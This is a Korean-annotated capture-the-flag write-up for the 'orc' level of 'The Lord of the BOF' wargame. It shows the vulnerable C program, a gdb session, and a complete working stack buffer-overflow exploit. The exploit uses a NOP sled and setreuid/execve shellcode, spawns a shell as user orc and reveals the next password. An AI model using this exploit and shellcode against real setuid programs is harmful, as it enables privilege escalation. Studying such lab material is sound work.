[goblin@localhost goblin]$ cat orc.c
/*
The Lord of the BOF : The Fellowship of the BOF
- orc
- egghunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
/*
 * Entry point of the "orc" level binary.
 *
 * Reads argv[1], wipes every environment string, requires byte 47 of
 * argv[1] to be 0xbf, then copies argv[1] into a 40-byte stack buffer
 * with strcpy() and prints it.
 *
 * Notes for the reader:
 * - main is declared without a return type (implicit int, pre-C99 style).
 * - memset(), strlen() and strcpy() are used without <string.h>, so they
 *   are implicitly declared here.
 */
main(int argc, char *argv[])
{
char buffer[40];   // fixed-size destination of the strcpy() below
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// Zero the contents of every environment variable string. This is meant to
// block the "egghunter" approach (placing a payload in an environment
// variable): after this loop the environment holds only NUL bytes.
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
// Requires byte 47 of argv[1] to be 0xbf. With buffer(40)+sfp(4) preceding
// the saved return address, bytes 44..47 of the copied input land on it, and
// 0xbf as its high byte restricts the target to the stack region.
// Note: argv[1][47] is read without checking the length of argv[1], so a
// shorter argument makes this an out-of-bounds read of the argv string.
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// No length check: argv[1] is copied unbounded into the 40-byte buffer,
// overwriting the saved frame pointer and return address when it is longer.
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
[goblin@localhost goblin]$ gdb ./orc1
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) disas main
Dump of assembler code for function main:
0x8048500 <main>: push %ebp
0x8048501 <main+1>: mov %ebp,%esp
0x8048503 <main+3>: sub %esp,44
0x8048506 <main+6>: cmp DWORD PTR [%ebp+8],1
0x804850a <main+10>: jg 0x8048523 <main+35>
0x804850c <main+12>: push 0x8048630
0x8048511 <main+17>: call 0x8048410 <printf>
(중간 생략)
0x80485ae <main+174>: mov %esi,%esi
0x80485b0 <main+176>: mov %eax,DWORD PTR [%ebp+12]
0x80485b3 <main+179>: add %eax,4
0x80485b6 <main+182>: mov %edx,DWORD PTR [%eax]
0x80485b8 <main+184>: push %edx
---Type <return> to continue, or q <return> to quit---
0x80485b9 <main+185>: lea %eax,[%ebp-40]
0x80485bc <main+188>: push %eax
0x80485bd <main+189>: call 0x8048440 <strcpy>
0x80485c2 <main+194>: add %esp,8
0x80485c5 <main+197>: lea %eax,[%ebp-40]
0x80485c8 <main+200>: push %eax //<--strcpy후에 스택을 보기위해 브레이크포인트를 거는 지점
0x80485c9 <main+201>: push 0x8048659
0x80485ce <main+206>: call 0x8048410 <printf>
0x80485d3 <main+211>: add %esp,8
0x80485d6 <main+214>: leave
0x80485d7 <main+215>: ret
0x80485d8 <main+216>: nop
0x80485d9 <main+217>: nop
End of assembler dump.
(gdb) b*main+200
Breakpoint 1 at 0x80485c8
(gdb) r `python -c 'print "\xbf"*48'`
Starting program: /home/goblin/./orc1 `python -c 'print "\xbf"*48'`
Breakpoint 1, 0x80485c8 in main ()
(gdb) x/100x $esp
0xbffffabc: 0x00000015 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffacc: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffadc: 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf 0xbfbfbfbf
0xbffffaec: 0xbfbfbfbf 0x00000000 0xbffffb34 0xbffffb40 //<--0xbffffaec에 ret값이 들어가는데 그값을 nop주소로 바꾼다.
0xbffffafc: 0x40013868 0x00000002 0x08048450 0x00000000
nop를 넉넉히 넣어주고 리턴주소를 nop중간으로 뛰게 설정해준다.
버퍼(40)+sfp(4)+ret(4)+nop(200)+쉘코드
[goblin@localhost goblin]$ ./orc `python -c 'print "A"*44+"\x88\xfb\xff\xbf"+"\x90"*200+"\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒1▒1̀▒É▒1▒F̀1▒Ph//shh/bin▒▒PS▒▒°
̀
bash$ whoami
orc
bash$ my-pass
euid = 504
cantata